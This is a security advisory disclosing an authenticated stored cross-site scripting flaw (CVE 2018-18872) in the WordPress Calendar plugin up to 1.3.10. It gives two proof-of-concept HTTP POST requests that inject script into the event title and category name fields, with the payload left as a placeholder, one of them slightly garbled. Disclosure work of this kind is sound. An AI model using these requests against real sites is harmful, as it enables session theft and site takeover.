Calendar <= 1.3.10 – Authenticated Stored Cross-Site Scripting (XSS) | CVE 2018-18872

Description

This WordPress plugin allows remote authenticated users, without the unfiltered_html capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges.

Proof of Concept

POC 1#

You can inject JavaScript code into the event title when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close

action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB


POC 2#
You can inject JavaScript code into the category name when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close

mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS È&category_colour=&save=Save+%C2%BB